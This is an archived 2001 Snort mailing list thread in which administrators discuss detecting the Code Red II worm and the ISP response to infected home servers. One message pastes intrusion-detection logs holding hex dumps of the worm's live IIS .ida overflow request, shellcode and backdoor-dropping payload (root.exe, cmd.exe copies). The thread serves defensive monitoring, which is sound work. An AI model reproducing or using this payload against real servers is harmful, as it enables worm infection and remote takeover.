Snort mailing list archives
Code Red II
From: "Murphy" <murphy () infomaniak ch>
Date: Sun, 5 Aug 2001 08:20:45 +0200
Yup, I've also seen this new outcrop, there is some more info in a discution going over here : http://grc.com/x/talk.exe?cmd=article&group=grc.security&item=21298&utag= and here http://www.incidents.org/diary/diary.php In the same periode of time, I've logged 2 time more CodeRed II than *good old* CodeRed v1;v2.
From what I read it seems that most of the new variant have seeded the @Home
domain, so we're dealing with lots of home users that very probably don't really know what's going on their server. I think putting some pressure on the larger ISPs (@home, etc...) to push them to be more *aggressive* with infected home users should be considered. Because with such a huge pool of unchecked servers, it's not getting any easier for the worm to go the way of the dodo. Murphy -----Original Message----- From: snort-users-admin () lists sourceforge net [mailto:snort-users-admin () lists sourceforge net]On Behalf Of jaywhy Sent: Sunday, August 05, 2001 00:32 To: snort-users () lists sourceforge net Subject: [Snort-users] Code Red II I have been noticing a new version of the Code Red worm. At first I got logs just trying to access the default.ida exploit. Which is the standard Code Red Worm. Code Red II does the original exploit but I guess if that doesn't work it tries Web-IIS cmd.exe access. The web-iss cmd.exe exploit I believe was part of the sadmind worm. That worm infected solaris systems through a buffer overflow then searched for windows comps running iis. I been getting alot of these so it's been spreading. [**] WEB-IIS ISAPI .ida attempt [**] 08/04-17:01:06.320498 65.80.21.130:4594 -> 65.1.151.143:80 TCP TTL:111 TOS:0x0 ID:51825 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x498FD68A Ack: 0xCF75FF5D Win: 0x4470 TcpLen: 20 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`.... 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00 ....dg.6..dg.&.. E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\... 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@ 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=... 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=........... C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00 ...T....u..~0... 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A ........F0...... 00 00 00 43 6F 64 65 52 65 64 49 49 00 8B 1C 24 ...CodeRedII...$ FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50 .U.f.....8.....P FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50 .......j...P...P 8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84 ..8...P.E..p.... 00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4 .....8....thS.U. FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00 .U..E.i.T...,... 81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7 ..,............. 89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00 .F4.E.Pj..u..... 00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55 ......j.j..U.P.U D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00 .Ou..;...i.T.... 5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A \&....\&.W.U.j.j 16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45 ..U.j..U....F4)E 84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0 .jd.U...<...P.U. 0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7 ...<...=....s... 85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF .>......s.f..p.. FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00 ...f..r....P.d.. 00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8 ...t...j.j.j..U. 83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80 ...t..E.j.Th~f.. FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50 .u..U.Yj...p...P FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33 .u..U........tK3 DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF ..U.=3'..u?..h.. FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7 .......l........ 85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF .`........E...d. FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF ....h...Pj...`.. FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66 .Pj.j..U..j.Th~f 04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00 ...u..U.Y...u1.. 00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00 ...X-....j.h.... 50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00 P.u..U.=....u.j. 6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF j...\...P.u..U.. 75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81 u..U..........w. C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00 ..........xu.... F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06 ..`......d$.dg.. 00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26 ..Xa..dg.6..dg.& 00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50 ..f.;MZu..K<.<.P 45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C E..u..T.x...B..< 03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75 .KERNu..|..EL32u BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47 .3.I.r ...A..<.G 65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03 etPu..|..rocAu.. 4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03 J.I...J$........ 4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00 J.......D$$dg... 00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8 .Xa..Q....]..E.. 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 ....LoadLibraryA 00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43 ..u..U..E......C 72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF reateThread..u.. 55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63 U..E......GetTic 6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC kCount..u..U..E. E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55 .....Sleep..u..U F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst 65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00 emDefaultLangID. FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65 .u..U..E......Ge 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 tSystemDirectory 41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00 A..u..U..E...... 43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8 CopyFileA..u..U. 89 45 DC E8 10 00 00 00 47 6C 6F 62 61 6C 46 69 .E......GlobalFi 6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45 ndAtomA..u..U..E D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 64 64 41 ......GlobalAddA 74 6F 6D 41 tomA =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [**] WEB-IIS cmd.exe access [**] 08/04-17:01:06.373751 65.80.21.130:4594 -> 65.1.151.143:80 TCP TTL:111 TOS:0x0 ID:51826 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x498FDC3E Ack: 0xCF75FF5D Win: 0x4470 TcpLen: 20 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_ 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E. E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u. FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U.. 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E.... 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E..... 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E.. 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U.. 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E..... 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname.. 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u. FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E..... 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx.. 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i... 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4.... C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t. C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................ E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................ E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ...... FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................ FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y.. 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........ 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t.. 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U.. BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD. 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj.... 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe... 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j.. 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\ 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\ 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe.. 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U... 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP......... FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@... 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%)......... 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................ 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ... 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@.............. 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@... 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................ 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ............... 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0... 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................ 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`.. 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... .... 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@............. 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............ 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@..... FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @.. 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @.. 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2... 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@....... 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@......h.$@.h 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h.... E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5. 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@... 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........ 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.....h.$@.h. 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@ 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@.. C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff. 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217.... 40 00 89 35 @..5 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: http://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: http://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Code Red II jaywhy (Aug 04)
- Code Red II Murphy (Aug 04)